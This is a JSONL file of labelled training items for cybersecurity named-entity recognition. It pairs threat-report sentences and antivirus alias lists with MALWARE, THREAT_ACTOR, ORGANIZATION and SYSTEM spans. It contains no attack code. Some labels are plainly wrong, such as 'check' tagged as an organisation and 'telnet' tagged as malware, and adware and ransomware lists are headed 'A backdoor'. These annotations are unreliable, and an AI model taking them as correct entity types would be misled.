{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9964 BehavesLike.Win32.Trojan.mz Trojan/Win32.LockScreen.C1515946", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003022", "source": "cyner2_train"}}
{"text": "Also, the samples analyzed have the ability detect the presence of a virtual machine to ensure it's not being analyzed in a network sandbox.", "spans": {"SYSTEM: virtual machine": [[69, 84]], "SYSTEM: network sandbox.": [[124, 140]]}, "info": {"id": "cyner2_train_003023", "source": "cyner2_train"}}
{"text": "The current version of the malware allows the operator to steal files, keystrokes, perform screenshots, and execute arbitrary code on the infected host.", "spans": {"MALWARE: malware": [[27, 34]], "THREAT_ACTOR: operator": [[46, 54]], "SYSTEM: the infected host.": [[134, 152]]}, "info": {"id": "cyner2_train_003027", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Razy.D39D3F Trojan.Win32.KillProc.hd Trojan.BtcMine.2050 Trojan/Win32.KillProc TrojanDownloader:MSIL/Taily.A!bit RiskWare.BitCoinMiner Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003028", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32/Trojan.AHSJ-4985 Ransom_HC7.R002C0DAA18 Trojan.Win32.RedCap.ewxmze Virus.Ransom.Pycl.A!c TR/RedCap.qcvri Trojan/Win32.Ransom.C2347549 Trojan.Ransom.PyCL Ransom.FileLocker Trojan.DownLoader! Ransom.Win32 Trojan-Ransom.Crypren Trj/CI.A Win32/Trojan.Ransom.97f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003029", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Infostealer.Limitail Trojan.DownLoader26.6005 BehavesLike.Win32.Trojan.cm Trojan.MSIL.Injector Trojan.MSIL.Bladabindi.1 Trojan/Win32.RatTool.R208188 Trj/GdSda.A MSIL/SpyPSW.AVQ!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003032", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Strictor.D1B6BC BKDR_HPKELIHOS.SM4 Win32.Trojan.WisdomEyes.16070401.9500.9990 BKDR_HPKELIHOS.SM4 BehavesLike.Win32.Expiro.ch Trojan.WPCracker.u Trojan.Win32.Boaxxe W32/Injector.DDXZ!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003033", "source": "cyner2_train"}}
{"text": "RIG Exploit Kit - May 2015", "spans": {"MALWARE: RIG Exploit Kit": [[0, 15]]}, "info": {"id": "cyner2_train_003034", "source": "cyner2_train"}}
{"text": "Compared to other adversary groups, C0d0so0 has shown the use of more sophisticated tactics and tools and has been linked to leveraging zero-day exploits on numerous occasions in combination with watering hole and spear phishing attacks.", "spans": {"THREAT_ACTOR: adversary groups, C0d0so0": [[18, 43]], "MALWARE: tools": [[96, 101]], "VULNERABILITY: zero-day exploits": [[136, 153]]}, "info": {"id": "cyner2_train_003035", "source": "cyner2_train"}}
{"text": "Although Unit 42 cannot provide a full picture of the details surrounding the delivery of these samples, we are confident this activity targets Korean language speakers who use Samsung devices.", "spans": {"ORGANIZATION: Unit 42": [[9, 16]], "MALWARE: samples,": [[96, 104]], "ORGANIZATION: Korean language speakers": [[144, 168]], "SYSTEM: Samsung devices.": [[177, 193]]}, "info": {"id": "cyner2_train_003036", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/Cosmu.aqmz Trojan.Win32.Cosmu.divg Trojan.Win32.Z.Cosmu.1849214 W32.Dzan.l3Vn Trojan.DownLoader19.64657 Trojan.Cosmu.Win32.7698 Trojan-Dropper.Win32.Injector Trojan/Cosmu.mih Trojan[Downloader]/Win32.Wren Trojan.Win32.Cosmu.divg Trojan.Cosmu Trj/CI.A Win32.Trojan.Cosmu.Dypy W32/Malicious_Behavior.VEX Win32/Worm.15b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003037", "source": "cyner2_train"}}
{"text": "The attacks came to light when a bank in Poland discovered previously unknown malware running on a number of its computers.", "spans": {"ORGANIZATION: bank": [[33, 37]], "MALWARE: unknown malware": [[70, 85]], "SYSTEM: computers.": [[113, 123]]}, "info": {"id": "cyner2_train_003038", "source": "cyner2_train"}}
{"text": "On each system several tools were used to find, encrypt, and delete the original files as well as any backups.", "spans": {"SYSTEM: system": [[8, 14]], "MALWARE: tools": [[23, 28]]}, "info": {"id": "cyner2_train_003039", "source": "cyner2_train"}}
{"text": "Unit 42 researchers have uncovered a malware distribution campaign that is delivering the LokiBot information stealer via business email compromise BEC phishing emails", "spans": {"ORGANIZATION: Unit 42 researchers": [[0, 19]], "THREAT_ACTOR: malware distribution campaign": [[37, 66]], "MALWARE: LokiBot information stealer": [[90, 117]]}, "info": {"id": "cyner2_train_003041", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.Qhost.724992 Trojan.Win32.Qhost!O Trojan.BeeVry Trojan.Qhost Worm.AutoRun.Win32.64118 Win32.Worm.Autorun.ah W32/Trojan2.OFIZ W32.SillyFDC WORM_YAHLOVER.SM Trojan.Win32.Qhost.afes Trojan.Win32.Qhost.boicaq Trojan.Win32.A.Qhost.724992 Trojan.MulDrop3.42831 WORM_YAHLOVER.SM BehavesLike.Win32.Autorun.bt W32/Trojan.RWER-6321 Trojan/Qhost.gez Trojan/Win32.Qhost Troj.W32.Qhost.tn9x Trojan.Win32.Qhost.afes HEUR/Fakon.mwf W32/Autorun.worm.aadm Trojan.Qhost Trojan.Qhost Win32/AutoRun.VB.AVY Trojan.Qhost!hFnYX0CfRwA Worm.Win32.VB", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003042", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.DownloadDAB.Trojan Worm.MSIL.Arcdoor!O Worm.Arcdoor.ae3 Worm.Arcdoor.Win32.1086 Trojan/Arcdoor.ae MSIL.Worm.Arcdoor.b W32/Trojan2.NFSU Backdoor.Trojan Win32/Pontoeb.A BKDR_PONTOEB.SMHA Win.Trojan.Worm-74 Worm.MSIL.Arcdoor.ae Trojan.Win32.Arcdoor.ctsdhw Msil.Worm.Arcdoor.Lknq BKDR_PONTOEB.SMHA Worm.MSIL W32/Trojan.LEEP-1569 Worm.MSIL.fi WORM/MSIL.Arcdo.aea Worm/MSIL.Arcdoor Backdoor:MSIL/Pontoeb.G Trojan.Win32.Z.Arcdoor.26624 Worm.MSIL.Arcdoor.ae Worm/Win32.Arcdoor.R11889 MSIL/Arcdoor.AE MSIL/AntiVM.V!tr Win32/Worm.bed", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003044", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.LoadMoney.eprnxa PUP.LoadMoney/Variant Trojan.LoadMoney.2303 PUA.SearchGo ADWARE/SearchGo.avskt PUP/Win32.Searchgo.R201982 Adware.SearchGo", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003046", "source": "cyner2_train"}}
{"text": "The widespread use of telnet, along with a list of factory default usernames and passwords, result in botnets with sizes that is beyond imagination.", "spans": {"MALWARE: telnet,": [[22, 29]], "VULNERABILITY: factory default usernames and passwords,": [[51, 91]], "MALWARE: botnets": [[102, 109]]}, "info": {"id": "cyner2_train_003047", "source": "cyner2_train"}}
{"text": "are designed to resemble tracking e-mails from different post offices around the world.", "spans": {"ORGANIZATION: post offices": [[57, 69]]}, "info": {"id": "cyner2_train_003048", "source": "cyner2_train"}}
{"text": "The first section aims to analyze the malware's capabilities e.g.: c2 connectivity, encoding mechanisms and overall system activity.", "spans": {}, "info": {"id": "cyner2_train_003050", "source": "cyner2_train"}}
{"text": "This RAT looks new to us; hence we suspected that it may either be a new RAT family or a custom RAT that was developed for a specific attacker hacker", "spans": {"MALWARE: RAT": [[5, 8], [73, 76]], "MALWARE: custom RAT": [[89, 99]], "THREAT_ACTOR: a specific attacker hacker": [[123, 149]]}, "info": {"id": "cyner2_train_003051", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Clod3a9.Trojan.e28b Win32.Trojan.WisdomEyes.16070401.9500.9998 Backdoor.Trojan trojan.win32.skeeyah.a!rfn W32/Trojan.FVPV-5651 TR/Crypt.ZPACK.mwex TrojanDropper:Win32/Barlaiy.A!dha Trojan-Downloader.Win32.FraudLoad Trj/CI.A Win32/Trojan.0e6", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003053", "source": "cyner2_train"}}
{"text": "This cyber-espionage group was dubbed Rocket Kitten,' and remains active as of this writing, with reported attacks as recent as October 2015.", "spans": {"THREAT_ACTOR: cyber-espionage group": [[5, 26]], "THREAT_ACTOR: Rocket Kitten,'": [[38, 53]], "MALWARE: attacks": [[107, 114]]}, "info": {"id": "cyner2_train_003054", "source": "cyner2_train"}}
{"text": "Late last week Talos researchers noticed a drastic uptick in Angler Exploit Kit activity.", "spans": {"ORGANIZATION: Talos researchers": [[15, 32]], "MALWARE: Angler Exploit Kit": [[61, 79]]}, "info": {"id": "cyner2_train_003055", "source": "cyner2_train"}}
{"text": "This blog presents our analysis of one of the latest malware variants targeting individuals in Taiwan, which exhibits some interesting characteristics that can be useful for detecting and defending against the threat – including the creation of an obese file, weighing in at 500MB, as part of its execution.", "spans": {"MALWARE: malware variants": [[53, 69]], "MALWARE: threat": [[210, 216]]}, "info": {"id": "cyner2_train_003056", "source": "cyner2_train"}}
{"text": "CitizenLab connect the infrastructure used in the campaign to previous malware operations targeting a Tibetan radio station and the Thai government.", "spans": {"ORGANIZATION: CitizenLab": [[0, 10]], "SYSTEM: infrastructure": [[23, 37]], "THREAT_ACTOR: campaign": [[50, 58]], "MALWARE: malware operations": [[71, 89]], "ORGANIZATION: Tibetan radio station": [[102, 123]], "ORGANIZATION: the Thai government.": [[128, 148]]}, "info": {"id": "cyner2_train_003059", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Zlob.60259 Trojan.NSIS.StartPage.Q Trojan.Zlob.60259 Win32/SillyDl.YHD Win.Trojan.NSIS-38 Trojan-Downloader.Win32.NSIS.io Trojan.Zlob.60259 Riskware.Nsis.Adw.cxexqq Troj.Downloader.W32.Lipler.lkqh Trojan.Zlob.60259 Trojan.Fakealert.26734 BehavesLike.Win32.AdwareSearchProtect.kc TrojanDownloader:Win32/Gabeerf.A Trojan.Zlob.DEB63 Trojan.Win32.Banker.140384 Trojan.Zlob.60259 Trojan/Win32.StartPage.R26935 Trojan.NSIS", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003060", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.AutoRunLUL.Worm Trojan.Downloader.Bredolab.AA Packed.Win32.Tadym!O Trojan.Tadym Downloader-BTR.a Trojan.Downloader.Bredolab.AA TROJ_BREDLAB.SMB Win32.Trojan.WisdomEyes.16070401.9500.9994 TROJ_BREDLAB.SMB Win.Trojan.Bredolab-4616 Packed.Win32.Tadym.b Trojan.Downloader.Bredolab.AA Trojan.Win32.Tadym.deqzho Win32.Packed.Tadym.Pdmb Trojan.Downloader.Bredolab.AA TrojWare.Win32.TrojanDropper.HDrop.B Trojan.Downloader.Bredolab.AA Win32.HLLW.Autoruner.6644 Backdoor.CPEX.Win32.27835 BehavesLike.Win32.RAHack.mc Worm/AutoRun.nlq Trojan[Packed]/Win32.Tadym TrojanDropper:Win32/Emold.C Troj.W32.Vaklik.l3JH Packed.Win32.Tadym.b Trojan.Downloader.Bredolab.AA Trojan.Downloader.Bredolab.AA BScope.Trojan.Ballast Worm.AutoRun!kxuXEtVXF84 Trojan.Win32.Bredolab", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003061", "source": "cyner2_train"}}
{"text": "InPage is a word processor program that supports languages such as Urdu, Persian, Pashto, and Arabic.", "spans": {"SYSTEM: InPage": [[0, 6]], "SYSTEM: word processor program": [[12, 34]]}, "info": {"id": "cyner2_train_003062", "source": "cyner2_train"}}
{"text": "This operation is another example of a threat actor using just enough technical sophistication to exploit a target.", "spans": {"THREAT_ACTOR: This operation": [[0, 14]], "THREAT_ACTOR: threat actor": [[39, 51]], "VULNERABILITY: exploit": [[98, 105]]}, "info": {"id": "cyner2_train_003063", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.FamVT.ExpiroPC.PE Trojan.Kazy.D765A4 Heur.Corrupt.PE BehavesLike.Win32.PWSGamania.dc HackTool.Win32.QQExplorer HackTool/Win32.QQExplorer HackTool:Win32/QQExplorer.1_26.dam#2 HackTool/Win32.QQExplorer.C1530039 Trj/CI.A Win32/Trojan.dd5", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003066", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Ransom.Locky.D6 Trojan.Barys.DD3B9 W32.Pilleuz Win32.Trojan-Downloader.Kryptik.ER Trojan.Win32.Inject.ebobum Trojan.Win32.Z.Injector.119812 BackDoor.Andromeda.1478 Dropper.Injector.Win32.77187 BehavesLike.Win32.PWSZbot.ch W32/Trojan.LSBE-5509 TrojanDropper.Injector.bhwe Backdoor:Win32/Wondufi.A TrojanDropper.Injector Trj/GdSda.A Trojan.DR.Injector!1yj9x8ODPcQ W32/Kryptik.FIKL!tr Win32/Trojan.02c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003068", "source": "cyner2_train"}}
{"text": "Some of the more interesting commands include : SMS Control Update the address of the C & C server — SMS starting with “ http : // ” Send AES-encrypted SMS message back to sender — SMS starting with “ sms : // ” Update service wake-up interval — “ 2 ” Kill switch — “ 4 ” C & C Control Update the address of the C & C server — “ 1 ” Update service wake-up interval — “ 2 ” Lock the screen — “ 5 ” Display a picture in a WebView from an arbitrary URL — “ 11 ” Send an arbitrary SMS message — “ 8 ” Steal images saved on the device — “ 12 ” and “ 13 ” Use the accessibility service to become the default SMS app — “ 6 ” Enable recording of other apps — “ 15 ” Kill switch — “ 4 ” The Lockdown Screen Most thieves don ’ t want to be caught red-handed as they steal — they want to buy some time to get away with the loot .", "spans": {}, "info": {"id": "cyner2_train_003069", "source": "cyner2_train"}}
{"text": "Many of these samples have not been discussed publicly and several have very little or no anti-virus coverage.", "spans": {}, "info": {"id": "cyner2_train_003070", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor/W32.Lithium.38400 Backdoor.Lithium.F Win32/Lithium.102 Backdoor.Trojan W32/LithBack.1_02 BKDR_LITH.102.A Win32.Lithium.102.a Backdoor.Win32.Lithium.102 Backdoor.Lithium.1.0.2 Backdoor.Win32.Lithium.102!IK Backdoor.Win32.Lithium.102 Backdoor.Lithium.1.0.2 BackDoor.Lithium.102 BDS/Lithium.102.Srv BKDR_LITH.102.A Win32/Lithium.D Backdoor/Lithium.102 Backdoor:Win32/Lithium.1_02 Backdoor.Win32.Lithium_102.38400 Backdoor.Lithium.1.0.2 Win-Trojan/Lithium.38400 Backdoor.Lithium.102 Backdoor.Trojan Backdoor.Lithium.102.b Backdoor.Win32.Lithium.102 W32/Lithium!tr.bdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003071", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrojanDownloader.Admedia Multi.Threats.InArchive Trojan.Dropper Win32/Donnic.D Win.Downloader.Small-3527 Trojan-Downloader.Win32.QQHelper.va Trojan.Win32.QQHelper.ybwad Troj.Downloader.W32!c Trojan.DownLoader.14343 Backdoor.CPEX.Win32.15449 BehavesLike.Win32.Backdoor.tc Trojan-Downloader.Win32.QQHelper TrojanDownloader.VB.lr TR/Dldr.Harnig.5 Trojan[Downloader]/Win32.QQHelper Trojan:Win32/Zaptusk.A Trojan-Downloader.Win32.QQHelper.va Worm.WhiteIce Trj/Multidropper.BQE Win32.Trojan-downloader.Qqhelper.Dzaq Win32/Trojan.Downloader.c98", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003074", "source": "cyner2_train"}}
{"text": "After spending more time analyzing the proxy, we realized that the requests we were receiving were not related to ad-fraud activity as we initially suspected but instead appeared to be for some sort of VPN service.", "spans": {"SYSTEM: VPN service.": [[202, 214]]}, "info": {"id": "cyner2_train_003075", "source": "cyner2_train"}}
{"text": "A backdoor also known as: AutoIt.Trojan.Injector.bq Trojan.Autoit W32/Injector.COJ!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003076", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Obfuscated.KU Trojan.Win32.Inject!O Trojan.Inject.Win32.41934 Trojan/Inject.bsb Win32.Trojan.WisdomEyes.16070401.9500.9746 Win.Trojan.Inject-12484 Trojan.Obfuscated.KU Trojan.Obfuscated.KU Trojan.Win32.Inject.cwlvrx AdWare.W32.Cinmus.kYTY Trojan.Obfuscated.KU Trojan.DownLoader1.2110 Trojan.Win32.Malware.a Trojan.Rootkit Trojan/Win32.Inject Win32.Adware.CinmusT.lm.230980 Trojan.Obfuscated.KU Trojan:Win32/Cinmus.K Trojan/Win32.Inject.C140611 Trojan.Obfuscated.KU Trojan.Win32.Malware.a SScope.Trojan.Cinmus.39 Win32.Trojan.Inject.bidk Trojan.Inject!Lqw/iuX+8xA W32/Malware_fam.NB", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003078", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Multi Trojan.Foreign.Win32.57563 Trojan.Johnnie.D12DD3 Trojan-Ransom.Win32.Foreign.nxyh Trojan.Win32.Panda.exmste Trojan.Win32.Z.Johnnie.582144 Trojan.PWS.Panda.12917 BehavesLike.Win32.Backdoor.hc Trojan.Win32.Crypt W32/Trojan.MEZF-9098 TR/AD.PepaBot.pabel TrojanDropper:Win32/Ropest.A Trojan-Ransom.Win32.Foreign.nxyh TrojanPSW.Panda Trj/GdSda.A W32/Kryptik.FQTY!tr Win32/Trojan.acd", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003079", "source": "cyner2_train"}}
{"text": "Dozens of targets may receive the exact same message.", "spans": {}, "info": {"id": "cyner2_train_003080", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.Dialer.10624 Trojan.Dialer.AY Trojan/Dialer.ay Trojan.Dialer.AU1 W32/Qdialer.J Dialer.DialPlatform Win32/SilentCaller.D TROJ_MALQES.A Trojan.Win32.Dialer.ay Trojan.Dialer.AY Trojan.Win32.Dialer.ay!IK TrojWare.Win32.Dialer.NAD Dialer.Silent TR/Drop.Delf.DJ.3 TROJ_MALQES.A Trojan/Dialer.ay Trojan:Win32/Adialer.AX Trojan.Win32.Dialer.10656 Win-AppCare/Dialer.10624 Trojan.Dialer.AY W32/Qdialer.J OScope.Dialer.VL Win32/Dialer.NAD Trojan.Win32.Dialer.ay Dialer.8.AP", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003081", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.Inject.68935 Packed.Win32.TDSS!O Trojan/Inject.oc Win32.Trojan.WisdomEyes.16070401.9500.9868 Backdoor.Trojan Trojan.Win32.Inject.oc Trojan.Win32.Inject.wpzg Troj.W32.Inject.oc!c BackDoor.Exte BehavesLike.Win32.Backdoor.kc Net-Worm.Win32.Mofeir Trojan/Inject.amwy Trojan/Win32.Inject Trojan:Win32/Oexsi.A Trojan.Win32.Inject.oc Trojan/Win32.Inject.C27812 Trojan.Inject Trojan.Downloader W32/BanLoader.AAAC!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003082", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TROJ_KREP.D Trojan.DownLoad3.10695 Trojan.Swisyn.Win32.8140 TROJ_KREP.D Trojan/Swisyn.jnt Trojan:Win32/Trixpi.A Trojan-Downloader.win32.Delf.xoq W32/Mdrop.CQO!tr Trojan.Win32.Trixpi.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003083", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor/W32.SdBot.25088.Q Backdoor/Afbot.a BKDR_POEBOT.DK Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Trojan BKDR_POEBOT.DK Backdoor.Win32.Afbot.a Trojan.Win32.Afbot.daze Backdoor.Win32.S.Afbot.25088 Backdoor.W32.Afbot.a!c Backdoor.Win32.Afbot.~A BackDoor.IRC.Afbot Backdoor.Afbot.Win32.1 Backdoor/Afbot.a Trojan[Backdoor]/Win32.Afbot Backdoor:Win32/Afbot.A Backdoor.Win32.Afbot.a Backdoor.Afbot Bck/Iroffer.BG Win32.Backdoor.Afbot.Szbp Backdoor.Afbot!ktevPrMqQWw W32/Afbot.A!tr.bdr Win32/Backdoor.BO.3c4", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003084", "source": "cyner2_train"}}
{"text": "These SQL servers are also used for command and control C2 functionality.", "spans": {"SYSTEM: SQL servers": [[6, 17]]}, "info": {"id": "cyner2_train_003087", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.Cosmu!O Worm.NadIote Trojan.Cosmu.Win32.2079 Win32.Worm.VB.pf W32/Risk.BXNI-0011 Win32/VB.AZL Trojan.Win32.Cosmu.ist Trojan.Win32.Cosmu.cojafm Win32.Trojan.Cosmu.Eehn Worm.Win32.Pronny.BL Win32.HLLW.Autoruner.14654 BehavesLike.Win32.VBObfus.fm W32/MalwareS.AKRW Trojan/Cosmu.pri Trojan/Win32.Cosmu Trojan.Win32.Cosmu.315392.A Trojan.Win32.Cosmu.ist HEUR/Fakon.mwf Trojan.VBO.05376 Trojan.Cosmu Win32/AutoRun.Spy.VB.E Trojan.Cosmu!52KOHqBZvHU", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003089", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Mauvaise.SL1 Win32.Trojan.WisdomEyes.16070401.9500.9950 Backdoor.Noknef TSPY_KONNI.A Trojan.Win32.Graftor.eoiwlz Dropper.S.Konni.266752 Trojan.MulDrop7.31720 TSPY_KONNI.A BehavesLike.Win32.Fake.dm W32/Trojan.NPTT-8320 TR/Graftor.266752.17 Trojan:Win32/Konny.A Backdoor.Noknef Backdoor.Win32.Hupigon Malicious_Behavior.SB", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003090", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Heur2.FU.E930ED Backdoor.Trojan Adware.Mutabaha.1206 Trojan:Win32/Winnti.V!dha Trojan.Win32.Z.Svchorse.725184 BScope.Trojan.SvcHorse.01643 PossibleThreat.SB!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003091", "source": "cyner2_train"}}
{"text": "Wild Neutron hit the spotlight in 2013, when it successfully infected companies such as Apple, Facebook, Twitter and Microsoft.", "spans": {"MALWARE: Wild Neutron": [[0, 12]], "ORGANIZATION: companies": [[70, 79]], "ORGANIZATION: Apple, Facebook, Twitter": [[88, 112]], "ORGANIZATION: Microsoft.": [[117, 127]]}, "info": {"id": "cyner2_train_003092", "source": "cyner2_train"}}
{"text": "Triggers ET rules for: RadminRMS, XPCSpyPro, RemoteAdmin.RemoteUtilities.C", "spans": {"MALWARE: RadminRMS,": [[23, 33]], "MALWARE: XPCSpyPro,": [[34, 44]], "MALWARE: RemoteAdmin.RemoteUtilities.C": [[45, 74]]}, "info": {"id": "cyner2_train_003093", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Dropper.Win32.Mudrop!O Win32.Trojan.WisdomEyes.16070401.9500.9756 Win.Trojan.VB-472 Trojan-Dropper.Win32.Mudrop.bq Trojan.MulDrop.5694 Downloader.VB.Win32.99231 BehavesLike.Win32.RAHack.hh TrojanDropper.Mudrop.dv Trojan[Dropper]/Win32.Mudrop TrojanDropper:Win32/Popuper.N Trojan.Downloader-SysMon Trojan-Dropper.Win32.Mudrop.bq TScope.Malware-Cryptor.SB Trojan-Dropper.Win32.Mudrop", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003094", "source": "cyner2_train"}}
{"text": "These include domains, file names, Java package names, and Facebook activity.", "spans": {}, "info": {"id": "cyner2_train_003095", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Inject.Win32.243804 Trojan.Win32.Delphi.ewuekh Trojan[Backdoor]/MSIL.NanoBot Trojan/Win32.Injector.R217510 Trojan.Symmi.D14210", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003096", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Loselove.A Backdoor.Loselove.A Trojan.Win32.Loselove.makvn Backdoor.Trojan BKDR_LOSELOVE.A Win32.Trojan Backdoor.Win32.Loselove Backdoor.Loselove.A Backdoor.Loselove.B Backdoor.Win32.Loselove.765952 Backdoor.Win32.Loselove.10 Backdoor.Loselove.A BackDoor.Loselove BDC/Loselove.1 BKDR_LOSELOVE.A Backdoor/LostLove.Client Win32.Hack.Loselove.kcloud Win-Trojan/Loselove.765952 Backdoor.Loselove.A Backdoor.Trojan Win32/Loselove.10 Backdoor.Win32.Loselove W32/Loselove.A!tr.bdr BackDoor.Loselove.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003098", "source": "cyner2_train"}}
{"text": "Potential infrastructure used to launch phishing attacks against the Macron presidential campaign.", "spans": {"SYSTEM: infrastructure": [[10, 24]], "ORGANIZATION: the Macron presidential campaign.": [[65, 98]]}, "info": {"id": "cyner2_train_003099", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.DownLoader24.49714 TR/Crypt.Xpack.enmvj Trojan/Win32.Invader Trojan.Graftor.D5A2C5 TrojanDownloader:Win32/Furs.A Trojan.Inject Trj/CI.A Win32/Trojan.223", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003100", "source": "cyner2_train"}}
{"text": "McAfee Labs has found that the latest Rovnix downloader now comes with the capability to check for the sinkholing of its control servers.", "spans": {"ORGANIZATION: McAfee Labs": [[0, 11]], "MALWARE: Rovnix downloader": [[38, 55]], "ORGANIZATION: check": [[89, 94]]}, "info": {"id": "cyner2_train_003101", "source": "cyner2_train"}}
{"text": "MuddyWater attacks are characterized by the use of a slowly evolving PowerShell-based first stage backdoor we call POWERSTATS", "spans": {"THREAT_ACTOR: MuddyWater": [[0, 10]], "SYSTEM: PowerShell-based": [[69, 85]], "MALWARE: backdoor": [[98, 106]], "MALWARE: POWERSTATS": [[115, 125]]}, "info": {"id": "cyner2_train_003105", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Alaveensee Win32.Trojan.WisdomEyes.16070401.9500.9994 W32/Trojan.YNOK-2169 Trojan.DownLoader10.48462 Trojan.Graftor.D1D3B0 Backdoor:Win32/Alaveensee.AC!bit Trojan.DownLoader!", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003106", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Dellogkbms.Trojan Trojan/W32.Small.40960.JU Trojan.Win32.ShipUp!O Trojan.Shipup.H5 Trojan.ShipUp.Win32.175 Trojan/ShipUp.nak Trojan.Zusy.DAD3 Win32.Trojan.WisdomEyes.16070401.9500.9999 TSPY_SHIPUP_CA080195.TOMC Win.Trojan.Shipup-7 Trojan.Win32.ShipUp.fufz Trojan.Win32.ShipUp.ijffr Win32.Trojan.Shipup.Isq TrojWare.Win32.ShipUp.NAK Trojan.Shipup.192 TSPY_SHIPUP_CA080195.TOMC Trojan.Win32.ShipUp Trojan.ShipUp.ar TR/Offend.46438158 Trojan/Win32.ShipUp Trojan:Win32/Shipup.H Trojan.Win32.A.ShipUp.40960.EO Trojan.Win32.ShipUp.fufz Trojan/Win32.Shipup.R27635 Trojan.ShipUp Trojan.Dropper.FW Trojan.ShipUp!FM//sdnjcwM", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003107", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Zenshirsh.SL7 Trojan.Ursnif Trojan.Ransom.99 Win32.Trojan.WisdomEyes.16070401.9500.9999 Ransom_HPCRYPMIC.SM2 Ransom_HPCRYPMIC.SM2 BehavesLike.Win32.Ransom.cc Trojan.Win32.Filecoder Trojan:Win32/Wirond.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003108", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.OnGameJ9KFZDll.Trojan Adware.Heur.E313D2 Win32.Trojan.WisdomEyes.16070401.9500.9834 Trojan.Adclicker ApplicUnwnt.Win32.Adware.Boran._0 Trojan.DownLoad.6111 not-a-virus:AdWare.Win32.Boran Trojan:Win32/Fexacer.A ADSPY/Superid.A Trojan:Win32/Fexacer.A Trojan/Win32.Popwin.R61755 AdWare.Boran Win32/Adware.Boran", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003109", "source": "cyner2_train"}}
{"text": "Adding in their creative waterholing and poisoned installer tactics, we describe the StrongPity APT as not only determined and well-resourced, but fairly reckless and innovative as well.", "spans": {"THREAT_ACTOR: StrongPity APT": [[85, 99]]}, "info": {"id": "cyner2_train_003110", "source": "cyner2_train"}}
